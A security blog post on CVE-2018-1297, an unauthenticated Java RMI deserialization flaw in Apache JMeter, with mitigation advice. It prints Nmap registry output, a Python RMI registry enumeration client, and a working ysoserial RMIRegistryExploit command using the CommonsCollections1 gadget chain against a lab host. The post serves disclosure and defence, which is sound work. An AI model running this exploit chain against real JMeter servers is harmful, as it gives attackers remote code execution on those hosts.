Apache JMeter RMI Code Execution PoC (CVE-2018-1297)

Black, pentestit.com, Apr 06, 2018, 6:05 a.m.
PENTESTIT:62C2F63914B8850584721DC827B72E61
EPSS: 0.004 (Low), percentile 73.5%

Recently, I read about a remote code execution (RCE) vulnerability, CVE-2018-1297, that affects yet another Apache product: JMeter. As you might know, “The Apache JMeter™ application is open source software, a 100% pure Java application designed to load test functional behavior and measure performance.” The CVE MITRE page does not give many details, saying only that “When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get access to JMeterEngine and send unauthorized code.” However, the Apache announce mailing list gave out some more information. With that information, I tried to see if I could create proof-of-concept code for CVE-2018-1297.


But before we do that, let’s get to know a bit about Java Remote Method Invocation (Java RMI). Java RMI allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine, usually on a different host. It provides remote communication between programs written in the Java programming language, and the arguments and return values of those remote calls travel over the wire as Java serialized objects, which the receiving side deserializes. You know where this is going, right? By default, the RMI registry listens on TCP port 1099.

I re-read the mailing list for the affected versions, and downloaded a couple of versions of Apache JMeter from its archive page. After uncompressing the archive, I read through the jmeter-server shell script and executed the jmeter-server.bat batch file.

The default jmeter-server script contains the following line, which starts JMeter in server mode (-s) with the RMI port taken from SERVER_PORT or defaulting to 1099:

${DIRNAME}/jmeter ${RMI_HOST_DEF} -Dserver_port=${SERVER_PORT:-1099} -s -j jmeter-server.log "$@"

This confirmed the port. Now, I fired up trusty old Nmap and got the following results (the output shows version detection and the rmi-dumpregistry NSE script, which runs as one of the default scripts, so pass -sV -sC to reproduce it, plus --reason for the REASON column):

nmap -p 1099 10.0.2.15
PORT     STATE SERVICE  REASON          VERSION
1099/tcp open  java-rmi syn-ack ttl 128 Java RMI Registry
| rmi-dumpregistry:
|   JMeterEngine
|      implements java.rmi.Remote, org.apache.jmeter.engine.RemoteJMeterEngine,
|     extends
|       java.lang.reflect.Proxy
|       fields
|           Ljava/lang/reflect/InvocationHandler; h
|             java.rmi.server.RemoteObjectInvocationHandler
|             @10.0.2.15:53142
|             extends
|               java.rmi.server.RemoteObject
|     Custom data
|       Classpath
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/avalon-framework-4.1.4.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/bsf-2.4.0.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/bsh-2.0b5.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/bshclient.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/commons-codec-1.10.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/commons-collections-3.2.1.jar
SNIP
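The same enumeration Nmap performs above, as an added example that is not part of the original post and not JMeter's or Nmap's code: a small Python client that does the JRMP handshake and an unauthenticated Registry.list() call, then parses the serialized String[] reply. The wire constants (magic, message types, the registry ObjID 0 and the list() method hash) come from the JDK's RMI implementation; the target host/port and the constructed sample reply produced by sample_list_reply() are assumptions made for this example.

```python
import socket
import struct
from typing import Optional

# JRMP stream-protocol bytes (sun.rmi.transport.TransportConstants)
JRMI_MAGIC = b"JRMI"
JRMI_VERSION = 2
STREAM_PROTOCOL = 0x4B
PROTOCOL_ACK = 0x4E
MSG_CALL, MSG_RETURN, RETURN_NORMAL = 0x50, 0x51, 0x01
# Java serialization tokens (java.io.ObjectStreamConstants)
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_NULL, TC_CLASSDESC, TC_STRING = 0x70, 0x72, 0x74
TC_ARRAY, TC_BLOCKDATA, TC_ENDBLOCKDATA = 0x75, 0x77, 0x78
# The registry always lives at ObjID 0; list() is selected by operation -1
# plus the 64-bit hash of java.rmi.registry.Registry.list().
REGISTRY_OBJNUM = 0
LIST_METHOD_HASH = 0x44154DC9D4E63BDF


def build_handshake() -> bytes:
    """Client hello: 'JRMI', protocol version 2, StreamProtocol."""
    return JRMI_MAGIC + struct.pack(">HB", JRMI_VERSION, STREAM_PROTOCOL)


def build_list_call() -> bytes:
    """Call message: ObjID (objNum + 14-byte UID) + operation -1 + method hash."""
    objid = struct.pack(">qiqh", REGISTRY_OBJNUM, 0, 0, 0)
    call = objid + struct.pack(">iQ", -1, LIST_METHOD_HASH)
    return bytes([MSG_CALL]) + STREAM_MAGIC + bytes([TC_BLOCKDATA, len(call)]) + call


def _utf(data: bytes, i: int):
    """Read a Java writeUTF() string (2-byte length prefix) at offset i."""
    n = struct.unpack_from(">H", data, i)[0]
    return data[i + 2:i + 2 + n].decode("utf-8", "replace"), i + 2 + n


def parse_list_reply(data: bytes) -> dict:
    """Decode a Return message carrying the serialized String[] of bound names.
    Also extracts the codebase annotation on the class descriptor, if the server
    sent one: that annotation mechanism is where rmi-dumpregistry's
    "Custom data / Classpath" lines come from."""
    if data[0] != MSG_RETURN or data[1:5] != STREAM_MAGIC or data[5] != TC_BLOCKDATA:
        raise ValueError("not a JRMP Return message")
    if data[7] != RETURN_NORMAL:
        raise ValueError("remote call threw an exception")
    i = 7 + data[6]                       # skip return type + 14-byte UID
    if data[i] != TC_ARRAY or data[i + 1] != TC_CLASSDESC:
        raise ValueError("expected TC_ARRAY with inline class descriptor")
    cls, i = _utf(data, i + 2)
    i += 9                                # serialVersionUID (8) + flags (1)
    nfields = struct.unpack_from(">H", data, i)[0]
    i += 2
    if cls != "[Ljava.lang.String;" or nfields != 0:
        raise ValueError(f"unexpected array class {cls!r}")
    codebase = None                       # MarshalOutputStream.annotateClass()
    if data[i] == TC_STRING:
        codebase, i = _utf(data, i + 1)
    elif data[i] == TC_NULL:
        i += 1
    if data[i] != TC_ENDBLOCKDATA or data[i + 1] != TC_NULL:
        raise ValueError("malformed class descriptor")
    i += 2
    count = struct.unpack_from(">i", data, i)[0]
    i += 4
    names = []
    for _ in range(count):
        if data[i] != TC_STRING:
            raise ValueError("expected TC_STRING element")
        name, i = _utf(data, i + 1)
        names.append(name)
    return {"names": names, "codebase": codebase}


def sample_list_reply(codebase: Optional[str] = None) -> bytes:
    """Constructed (not captured) reply announcing one binding, JMeterEngine."""
    suid = bytes.fromhex("add256e7e91d7b47")    # serialVersionUID of String[]
    ann = (bytes([TC_STRING]) + struct.pack(">H", len(codebase)) + codebase.encode()
           if codebase is not None else bytes([TC_NULL]))
    body = bytes([RETURN_NORMAL]) + b"\x00" * 14
    desc = (bytes([TC_CLASSDESC]) + struct.pack(">H", 19) + b"[Ljava.lang.String;"
            + suid + b"\x02\x00\x00" + ann + bytes([TC_ENDBLOCKDATA, TC_NULL]))
    name = b"JMeterEngine"
    return (bytes([MSG_RETURN]) + STREAM_MAGIC + bytes([TC_BLOCKDATA, len(body)]) + body
            + bytes([TC_ARRAY]) + desc + struct.pack(">i", 1)
            + bytes([TC_STRING]) + struct.pack(">H", len(name)) + name)


def _recv_exact(s: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed during handshake")
        buf += chunk
    return buf


def dump_registry(host: str, port: int = 1099, timeout: float = 5.0) -> dict:
    """Handshake and list() against a live registry; no credentials are involved."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_handshake())
        if _recv_exact(s, 1) != bytes([PROTOCOL_ACK]):
            raise ValueError("no ProtocolAck: not a JRMP endpoint?")
        n = struct.unpack(">H", _recv_exact(s, 2))[0]   # server sends our endpoint
        _recv_exact(s, n + 4)                           # host string + int port
        s.sendall(b"\x00\x00" + b"\x00\x00\x00\x00")     # our endpoint: "" / port 0
        s.sendall(build_list_call())
        reply = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("registry closed the connection")
            reply += chunk
            try:
                return parse_list_reply(reply)
            except (IndexError, struct.error):
                continue                                # reply not complete yet


if __name__ == "__main__":
    # 10.0.2.15 is the lab address used in this post; assumed, adjust to your target.
    print(dump_registry("10.0.2.15"))
```

Nothing in this exchange asks the client for credentials: anyone who can reach 1099/tcp gets the list of bound names, and the same class-annotation slot the parser reads is how an RMI server advertises its classpath to clients, which is how the Nmap output above tells us commons-collections-3.2.1.jar is on the server side.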

CVE-2018-1297 PoC:

This was it! Really, nothing else was needed: the registry answers without any authentication, and the classpath it advertises includes commons-collections-3.2.1.jar, a library with a well-known deserialization gadget chain. So, for fun, I loaded another trusty old tool, ysoserial, with the following command line options (target host, registry port, the CommonsCollections1 gadget chain and the command to run on the server):

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 10.0.2.15 1099 CommonsCollections1 "calc.exe"


As for mitigating this vulnerability, the advice is to upgrade your Java installation to Java 8 or Java 9 and to download the latest Apache JMeter 4.0, which uses an authenticated SSL RMI connection by default (server.rmi.ssl.disable=false in jmeter.properties, with a keystore generated by the bundled create-rmi-keystore script). One caveat: the registry-bind vector that ysoserial's RMIRegistryExploit uses is blocked by the built-in deserialization filter on the RMI registry in JDK 8u121 and later (JEP 290), but that filter does not protect the JMeterEngine remote object itself, so a newer JRE alone is not a fix. Upgrade JMeter as well, and never expose the server port (1099 by default) beyond the load-generator network.

The post Apache JMeter RMI Code Execution PoC (CVE-2018-1297) appeared first on PenTestIT.
